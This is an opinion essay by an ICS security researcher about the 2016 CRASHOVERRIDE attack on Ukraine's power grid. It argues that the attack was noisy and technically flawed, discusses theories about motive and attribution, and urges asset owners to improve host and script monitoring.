The CRASHOVERRIDE event is significant for many reasons: it represents the first-known malware-directed attack on civilian power systems; and it represents a worrying escalation in operations against Ukrainian critical infrastructure. Yet for all its conceptual boldness in expanding cyber attack operations within industrial control systems (ICS), at a technical, practical level the attack in many respects exhibited many mistakes, errors, and outright failures in execution. When examining the event, those interested in ICS security should appreciate the theoretical underpinnings and repercussions behind the event, but be careful not to lionize or deify the adversaries responsible for its (somewhat botched) execution.
As part of Virus Bulletin 2018, I recently published a white paper and gave a presentation on some of the mechanics of CRASHOVERRIDE – what steps were taken prior to its execution, and some notes on the malware framework itself. While prior work exists covering CRASHOVERRIDE – from both my employer Dragos and ESET – up until recently all coverage and discussion viewed CRASHOVERRIDE and its executors, ELECTRUM, as highly capable, complex adversaries. Yet after spending significant time reviewing previously unavailable information on the attack – its actual execution as well as precursors – such an assessment is unsupported by the evidence at hand. The following represents my personal, professional opinion on the CRASHOVERRIDE event, and is not an official position for my employer, Dragos.
Reviewing CRASHOVERRIDE, one is struck by the sheer noisiness of the attack. For example, while the attacker leveraged credential theft and reuse for movement within the target environment, they did so in such an indiscriminate manner that good visibility into network activity should have revealed egregious authentication attempts rather quickly. For example, early in the attack, the adversary queued up remote authentication attempts via RPC against hundreds of hosts within the target network, all taking place within minutes. Such brazen, almost careless activity should be caught and identified in a variety of detection schema – behavioral analytics or anomalies – yet in this case seemed to pass without alarm. Similarly, the attacker created some adversary-controlled privileged accounts within the network – a clearly malicious item but one that can only be identified if host-based monitoring is active and reviewed within the environment. I do not want this to turn into a shaming message on the victims, but perhaps those of us in the ICS community can look at this as a clear signal for how visibility and monitoring within control system networks must improve to catch what should be blatantly obvious malicious actions.
Moving beyond command-line (or scripted) noise, the attacker similarly was so confident in their ability (or the lack of defensive visibility) that multiple scripting objects – from VB scripts to PowerShell – were executed with absolutely no obfuscation whatsoever. This includes clearly obvious suspect behavior such as PowerShell downloading directly from an IP address and extensive scripting for remote program execution and system survey.
All of the above could be shrugged off as an adversary simply “living down” to the targeted environment, expending no more effort than necessary given poor visibility within the control system environment to execute an attack. This seems plausible, but further investigation into the actual attack reveals further concerns and signs that perhaps this was not as detailed and well-planned an attack as one might initially think.
First, there is an odd amount of variation among the different components of CRASHOVERRIDE and different versions of the attack tool. Previously, most work focused on the “primary” framework of a launcher combined with an effects DLL, a configuration file, and wiper DLL. Yet there were at least three variants of the supposedly similar CRASHOVERRIDE framework in play for the attack: the pattern described above; a variant using a hardcoded configuration file instead of a positionally designated one from the command line; and another variant combining two effects packages in a single self-contained executable. Furthermore, variations between packages such as the ability of the OPC-targeting module to enumerate connected OPC servers for potential targets indicates further diversity in what was initially thought to be a comprehensive, modular framework.
Second, when looked at in terms of actual functionality, it is not clear that many of the modules would have actually worked as they were coded. For example, the IEC-104 targeting module changes states on the targeted substations or controllers in such a way that may simply be ignored because of stateful violations. My colleagues Dan Gunter and Dan Michaud-Soucy (aka, “The Dans”) recently gave a talk at CS3STHLM on this topic noting that stateful controls and recognition provide non-trivial barriers to ICS-specific malware functionality. For example, a traffic light proceeds through defined states in determined orders – green to yellow to red to green in the United States. Thus stateful changes outside this order – e.g., green direct to red – represent anomalous, and potentially unactionable, state changes that result in at minimum confusion, and at worst a breakdown of the system in question. For CRASHOVERRIDE, modules such as the IEC-104 targeting portion were simply not state-aware per the protocol, thus testing in a lab environment resulted in… no noticeable effect. Quite simply, ignorance for how the protocol is actually supposed to work (as opposed to simply shifting from “Closed” to “Open” states on the target breakers) resulted in a seemingly complex payload rendered rather inert in practice.
Finally, separate from CRASHOVERRIDE itself, the attacker developed and deployed a disruptive module using a denial of service (DoS) vulnerability in Siemens SIPROTEC devices, first disclosed in 2015. Of note, this DoS tool is very specific to the targeted environment – target IP addresses are hardcoded within the malware itself, making this ineffective and irrelevant outside of the 2016 victim. Yet in putting this together, while the vulnerability appears to be properly targeted, byte conversion for IP addresses to create actual sockets to trigger the vulnerability is incorrectly applied. Thus each hard-coded address in the software is read in “backwards” when creating the communication socket, making the tool useless.
For all of these reasons, the sophisticated, frightening attack that is CRASHOVERRIDE resulted in a rather minor disruption: the total number of households impacted and the duration of impact were both noticeably lower than the 2015 Ukraine power outage, which relied on a far simpler attack mechanism for execution. As an aside, it is for these (and related) reasons that the term INDUSTROYER – used by ESET with the clearly stated implication that the malware represented the greatest threat to ICS since Stuxnet – seems ill-fitting and unjustified. While certainly work was expended to complete what would become CRASHOVERRIDE, the attack and its components are brittle, fragile, and to the extent that they worked in the target environment difficult (or impossible) to port to other frameworks. Thus, treating the attack for what it is – unique, ICS-targeting malware but of limited efficacy – seems reasonable. I say this while at the same time having incredible professional respect for ESET researchers Anton Cherepenov and Robert Lipovsky, who are both excellent malware analysts that have done significant good for the community, and my personal thoughts on the “bigger picture” surrounding CRASHOVERRIDE are not meant as a slight to their excellent technical analysis.
Shifting away from “how” CRASHOVERRIDE represented a less-than-ideal attack, or less sophisticated than originally envisioned, as human beings we must ask ourselves “why” did this event use seemingly poor methodology and ineffective tools considering the stakes. On this, we can never truly know without interviewing directly those responsible for building, developing, and ultimately deploying the malware. But, since this is at its heart an opinion piece, I can offer some theories that may explain the shoddiness behind this attack.
First, the attack may have simply been rushed. While evidence indicates access to the target environment beginning in at the latest October 2016 and possibly as early as January of the same year, one may reasonably conclude that a deadline existed for attack execution: mid- to late-December 2016, to match the timing of the 2015 attack. In establishing a deadline for the attack, the adversary (or their controlling authority) may have unintentionally “rushed” development and deployment of the actual capability in play. This would explain the lack of operational security around some of the control system network lateral movement (due to a rush to get in place), and the potential variation in attack framework code – essentially, based on the differences in modules deployed, one could almost claim that code was “shipped” as soon as it compiled with little regard for accuracy or efficacy.
A second theory is that two teams were involved in the execution of the attack: an initial access team (in this specific case, likely the Sandworm team) handed off operations to an ICS specialist group. Unfortunately for this event, the ICS operations group was either incompetent or inexperienced resulting in the problems documented above. While this is plausible for large, segmented organizations, this theory doesn’t seem to hold water as it defies logic to hand over a sensitive operation to an inexperienced, less capable team following initial access, even if that team possessed specialized knowledge that would enable some parts of the attack. However, exploring this possibility reveals something relevant to attribution of the CRASHOVERRIDE event. While some organizations were quick to identify Sandworm as a likely culprit given location and past history in Ukraine, the failures documented above strongly argue against a team with Sandworm’s capability as being responsible. The likelihood that an advanced, accomplished, and experienced group such as Sandworm could commit the documented errors when they have exhibited otherwise commendable operational security and tradecraft in other operations seems hard to defend.
Finally, it is possible that the attack itself was meant as nothing more than a demonstration – of both capability (that electric distribution-targeting software exists) and intent (and the adversary is unafraid to actually use such a capability). In this case, the technical sophistication and security of the operation is far less relevant than the simple fact that such an event happened. In fact, from a strategic messaging perspective, one could argue that the sloppiness of CRASHOVERRIDE may even be more effective in communicating a willingness to deploy ICS-focused attacks as it does not appear to even try to “hide” or evade detection. Unfortunately, this is perhaps the hardest motive to prove short of access to the perpetrators, but remains a tantalizing theory given the brazen nature of the attack.
Yet for all of these questions on “why” and curiosity at technical failures, there remain a number of technically interesting items relative to the attack. For one, the attack did attempt to apply a level of automation to ICS manipulation and disruption not seen since Stuxnet, even if the level of sophistication (to say nothing of the actual execution) pales in comparison to that seminal event. In this fashion, CRASHOVERRIDE can be seen as gradually moving the bar for ICS attacks forward (provided you accept Stuxnet as an outlier, which I do). Even still, the attack remains immature and rather limited in effects – thus making so much of the resulting hype unjustified or inaccurate. The attack is significant for abstract, technical reasons within the information security space, but cannot (as currently constructed) be leveraged to expand disruptive effects to far wider circumstances or consequences – at least, not without significant alterations and rewrites.
Yet – what if CRASHOVERRIDE was not a finalized tool but rather some hybrid between a demonstration capability (for strategic messaging) and “in production” testing? This theory seems to have some weight behind it when considering more recent developments surrounding Sandworm and linked activity in Eastern and Central Europe. For example, ESET’s recent reporting on Telebots activity and GreyEnergy shows that technical elements associated with both the 2015 and 2016 Ukraine power events remain active, and are continuing to evolve over time. From my perspective, what is most interesting is how portions of the CRASHOVERRIDE attack (such as the superfluous backdoor associated with the CRASHOVERRIDE malware) contains technical links to subsequent developments associated with Sandworm (aka, Telebots) and then GreyEnergy.
In this case, CRASHOVERRIDE’s use (and many errors) may very well reside within the “testing” category, albeit in an external (if permissive) environment. To rephrase: CRASHOVERRIDE was deployed, potentially prematurely, as a technical demonstration to not only Ukraine but many other parties that 1) such a capability (even if incomplete or not yet fully effective) exists and 2) those possessing such a capability are willing to use it. This has been stated before, but when married with the identification of evolved versions of components behind the attacks (noted above and very well analyzed by ESET), the attack can be placed in greater context as not an “end in itself”, but rather a “means to an end” – namely, showing off a technical capability and willingness able to disrupt electric distribution operations while continuing to work on said capability to improve it for future operations.
At this stage, for all the amateurism behind the CRASHOVERRIDE event and its execution, the attack remains worrying not as an event in itself, but as a precursor for things to come. In light of what we know for how the attack was executed, ICS asset owners and operators need to invest NOW in capabilities to improve monitoring and visibility extending into host process and command execution and scripting framework logging. Furthermore, while CRASHOVERRIDE is riddled with mistakes and miscalculations for unknown reasons, the presence of other items identified recently exposing evolved versions of tools associated with past Ukraine-linked events strongly indicates that CRASHOVERRIDE is not static – rather, one should anticipate continued development of this capability to be more effective for future use. Thus, while the 2016 Ukraine attack on its own does not represent all that sophisticated of an attack and can be judged – in isolation – as something of a failure, more worrisome is the very real possibility that this attack was just a trial run or “warm up” to test capabilities (and victim responses) with the intention of developing and deploying more complex and robust tools based on lessons learned.